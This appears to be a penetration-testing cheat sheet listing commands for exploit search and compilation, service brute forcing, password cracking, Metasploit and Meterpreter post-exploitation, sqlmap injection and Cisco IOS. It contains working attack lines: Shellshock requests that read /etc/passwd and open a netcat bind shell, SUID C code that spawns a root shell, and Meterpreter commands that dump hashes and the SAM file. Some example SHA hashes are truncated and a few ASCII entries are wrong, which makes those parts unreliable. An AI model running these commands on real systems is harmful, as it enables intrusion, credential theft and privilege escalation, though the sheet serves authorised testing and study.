BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
COMMAND | DESCRIPTION |
---|---|
searchsploit windows 2003 | grep -i local |
Search exploit-db for exploit, in this example windows 2003 + local esc |
site:exploit-db.com exploit kernel <= 3 |
Use google to search exploit-db.com for exploits |
grep -R "W7" /usr/share/metasploit-framework |
Search metasploit modules using grep – msf search sucks a bit |
Searching for Exploits
Install local copy of exploit-db:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Cross Compiling Exploits
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Exploiting Common Vulnerabilities
Exploiting Shellshock
A tool to find and exploit servers vulnerable to Shellshock:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443
Simple Local Web Servers
Python local web server command, handy for serving up shells and exploits on an attacking machine.
COMMAND | DESCRIPTION |
---|---|
python -m SimpleHTTPServer 80 |
Run a basic http server, great for serving up shells etc |
python3 -m http.server |
Run a basic Python3 http server, great for serving up shells etc |
ruby -rwebrick -e "WEBrick::HTTPServer.new |
Run a ruby webrick basic http server |
php -S 0.0.0.0:80 |
Run a basic PHP http server |
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
COMMAND | DESCRIPTION |
---|---|
mount 192.168.1.1:/vol/share /mnt/nfs |
Mount NFS share to /mnt/nfs |
mount -t cifs -o username=user,password=pass |
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history) |
net use Z: \\win-server\share password |
Mount a Windows share on Windows from the command line |
apt-get install smb4k -y |
Install smb4k on Kali, useful Linux GUI for browsing SMB shares |
HTTP / HTTPS Webserver Enumeration
COMMAND | DESCRIPTION |
---|---|
nikto -h 192.168.1.1 |
Perform a nikto scan against target |
dirbuster |
Configure via GUI, CLI input doesn’t work most of the time |
Packet Inspection
COMMAND | DESCRIPTION |
---|---|
tcpdump tcp port 80 -w output.pcap -i eth0 |
tcpdump for port 80 on interface eth0, outputs to output.pcap |
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
COMMAND | DESCRIPTION |
---|---|
python /usr/share/doc/python-impacket-doc/examples |
Enumerate users from SMB |
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt |
RID cycle SMB / enumerate users from SMB |
SNMP User Enumeration
COMMAND | DESCRIPTION |
---|---|
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 |
Enmerate users from SNMP |
python /usr/share/doc/python-impacket-doc/examples/ |
Enmerate users from SNMP |
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt |
Search for SNMP servers with nmap, grepable output |
Passwords
Wordlists
COMMAND | DESCRIPTION |
---|---|
/usr/share/wordlists |
Kali word lists |
Brute Forcing Services
Hydra FTP Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f |
Hydra FTP brute force |
Hydra POP3 Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f |
Hydra POP3 brute force |
Hydra SMTP Brute Force
COMMAND | DESCRIPTION |
---|---|
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V |
Hydra SMTP brute force |
Use -t
to limit concurrent connections, example: -t 15
Password Cracking
John The Ripper – JTR
COMMAND | DESCRIPTION |
---|---|
john --wordlist=/usr/share/wordlists/rockyou.txt hashes |
JTR password cracking |
john --format=descrypt --wordlist |
JTR forced descrypt cracking with wordlist |
john --format=descrypt hash --show |
JTR forced descrypt brute force cracking |
Windows Penetration Testing Commands
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Compiling Exploits
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
COMMAND | DESCRIPTION |
---|---|
process.h, string.h, winbase.h, windows.h, winsock2.h |
Windows exploit code |
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, |
Linux exploit code |
Build Exploit GCC
Compile exploit gcc.
COMMAND | DESCRIPTION |
---|---|
gcc -o exploit exploit.c |
Basic GCC compile |
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
COMMAND | DESCRIPTION |
---|---|
gcc -m32 exploit.c -o exploit |
Cross compile 32 bit binary on 64 bit Linux |
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
COMMAND | DESCRIPTION |
---|---|
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe |
Compile windows .exe on Linux |
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su
from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')
Spawn TTY Shell from Vi
Run shell commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit
Some basic Metasploit stuff, that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.
Meterpreter Payloads
Windows reverse meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload windows/meterpreter/reverse_tcp |
Windows reverse tcp payload |
Windows VNC Meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload windows/vncinject/reverse_tcp
|
Meterpreter Windows VNC Payload |
Linux Reverse Meterpreter payload
COMMAND | DESCRIPTION |
---|---|
set payload linux/meterpreter/reverse_tcp |
Meterpreter Linux Reverse Payload |
Meterpreter Cheat Sheet
Useful meterpreter commands.
COMMAND | DESCRIPTION |
---|---|
upload file c:\\windows |
Meterpreter upload file to Windows target |
download c:\\windows\\repair\\sam /tmp |
Meterpreter download file from Windows target |
download c:\\windows\\repair\\sam /tmp |
Meterpreter download file from Windows target |
execute -f c:\\windows\temp\exploit.exe |
Meterpreter run .exe on target – handy for executing uploaded exploits |
execute -f cmd -c |
Creates new channel with cmd shell |
ps |
Meterpreter show processes |
shell |
Meterpreter get shell on the target |
getsystem |
Meterpreter attempts priviledge escalation the target |
hashdump |
Meterpreter attempts to dump the hashes on the target |
portfwd add –l 3389 –p 3389 –r target |
Meterpreter create port forward to target machine |
portfwd delete –l 3389 –p 3389 –r target |
Meterpreter delete port forward |
Common Metasploit Modules
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
COMMAND | DESCRIPTION |
---|---|
use exploit/windows/smb/ms08_067_netapi |
MS08_067 Windows 2k, XP, 2003 Remote Exploit |
use exploit/windows/dcerpc/ms06_040_netapi |
MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
use exploit/windows/smb/ |
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules (exploits)
COMMAND | DESCRIPTION |
---|---|
use exploit/windows/local/bypassuac |
Bypass UAC on Windows 7 + Set target + arch, x86/64 |
Auxilary Metasploit Modules
COMMAND | DESCRIPTION |
---|---|
use auxiliary/scanner/http/dir_scanner |
Metasploit HTTP directory scanner |
use auxiliary/scanner/http/jboss_vulnscan |
Metasploit JBOSS vulnerability scanner |
use auxiliary/scanner/mssql/mssql_login |
Metasploit MSSQL Credential Scanner |
use auxiliary/scanner/mysql/mysql_version |
Metasploit MSSQL Version Scanner |
use auxiliary/scanner/oracle/oracle_login |
Metasploit Oracle Login Module |
Metasploit Powershell Modules
COMMAND | DESCRIPTION |
---|---|
use exploit/multi/script/web_delivery |
Metasploit powershell payload delivery module |
post/windows/manage/powershell/exec_powershell |
Metasploit upload and run powershell script through a session |
use exploit/multi/http/jboss_maindeployer |
Metasploit JBOSS deploy |
use exploit/windows/mssql/mssql_payload |
Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
COMMAND | DESCRIPTION |
---|---|
run post/windows/gather/win_privs |
Metasploit show privileges of current user |
use post/windows/gather/credentials/gpp |
Metasploit grab GPP saved passwords |
load mimikatz -> wdigest |
Metasplit load Mimikatz |
run post/windows/gather/local_admin_search_enum |
Idenitfy other machines that the supplied domain user has administrative access to |
run post/windows/gather/smart_hashdump |
Automated dumping of sam file, tries to esc privileges etc |
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII | CHARACTER |
---|---|
x00 |
Null Byte |
x08 |
BS |
x09 |
TAB |
x0a |
LF |
x0d |
CR |
x1b |
ESC |
x20 |
SPC |
x21 |
! |
x22 |
“ |
x23 |
# |
x24 |
$ |
x25 |
% |
x26 |
& |
x27 |
` |
x28 |
( |
x29 |
) |
x2a |
* |
x2b |
+ |
x2c |
, |
x2d |
– |
x2e |
. |
x2f |
/ |
x30 |
0 |
x31 |
1 |
x32 |
2 |
x33 |
3 |
x34 |
4 |
x35 |
5 |
x36 |
6 |
x37 |
7 |
x38 |
8 |
x39 |
9 |
x3a |
: |
x3b |
; |
x3c |
< |
x3d |
= |
x3e |
> |
x3f |
? |
x40 |
@ |
x41 |
A |
x42 |
B |
x43 |
C |
x44 |
D |
x45 |
E |
x46 |
F |
x47 |
G |
x48 |
H |
x49 |
I |
x4a |
J |
x4b |
K |
x4c |
L |
x4d |
M |
x4e |
N |
x4f |
O |
x50 |
P |
x51 |
Q |
x52 |
R |
x53 |
S |
x54 |
T |
x55 |
U |
x56 |
V |
x57 |
W |
x58 |
X |
x59 |
Y |
x5a |
Z |
x5b |
[ |
x5c |
\ |
x5d |
] |
x5e |
^ |
x5f |
_ |
x60 |
` |
x61 |
a |
x62 |
b |
x63 |
c |
x64 |
d |
x65 |
e |
x66 |
f |
x67 |
g |
x68 |
h |
x69 |
i |
x6a |
j |
x6b |
k |
x6c |
l |
x6d |
m |
x6e |
n |
x6f |
o |
x70 |
p |
x71 |
q |
x72 |
r |
x73 |
s |
x74 |
t |
x75 |
u |
x76 |
v |
x77 |
w |
x78 |
x |
x79 |
y |
x7a |
z |
CISCO IOS Commands
A collection of useful Cisco IOS commands.
COMMAND | DESCRIPTION |
---|---|
enable |
Enters enable mode |
conf t |
Short for, configure terminal |
(config)# interface fa0/0 |
Configure FastEthernet 0/0 |
(config-if)# ip addr 0.0.0.0 255.255.255.255 |
Add ip to fa0/0 |
(config-if)# ip addr 0.0.0.0 255.255.255.255 |
Add ip to fa0/0 |
(config-if)# line vty 0 4 |
Configure vty line |
(config-line)# login |
Cisco set telnet password |
(config-line)# password YOUR-PASSWORD |
Set telnet password |
# show running-config |
Show running config loaded in memory |
# show startup-config |
Show sartup config |
# show version |
show cisco IOS version |
# show session |
display open sessions |
# show ip interface |
Show network interfaces |
# show interface e0 |
Show detailed interface info |
# show ip route |
Show routes |
# show access-lists |
Show access lists |
# dir file systems |
Show available files |
# dir all-filesystems |
File information |
# dir /all |
SHow deleted files |
# terminal length 0 |
No limit on terminal output |
# copy running-config tftp |
Copys running config to tftp server |
# copy running-config startup-config |
Copy startup-config to running-config |
Cryptography
Hash Lengths
HASH | SIZE |
---|---|
MD5 Hash Length | 16 Bytes |
SHA-1 Hash Length | 20 Bytes |
SHA-256 Hash Length | 32 Bytes |
SHA-512 Hash Length | 64 Bytes |
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
HASH | EXAMPLE |
---|---|
MD5 Hash Example | 8743b52063cd84097a65d1633f5c74f5 |
MD5 $PASS:$SALT Example | 01dfae6e5d4d90d9892622325959afbe:7050461 |
MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
SHA1 Hash Example | b89eaac7e61417341b710b727768294d0e6a277b |
SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b |
SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a7 |
SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4 |
SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9 |
SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8 |
SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6ef |
NTLM Hash Example | b4b9b02e6f09a9bd760f388b67351e2b |
SQLMap Examples
COMMAND | DESCRIPTION |
---|---|
sqlmap -u http://meh.com --forms --batch --crawl=10 |
Automated sqlmap scan |
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE |
Targeted sqlmap scan |
sqlmap -u "http://meh.com/meh.php?id=1" |
Scan url for union + error based injection with mysql backend and use a random user agent + database dump |
sqlmap -o -u "http://meh.com/form/" --forms |
sqlmap check form for injection |
sqlmap -o -u "http://meh/vuln-form" --forms |
sqlmap dump and crack hashes for table users on database-name. |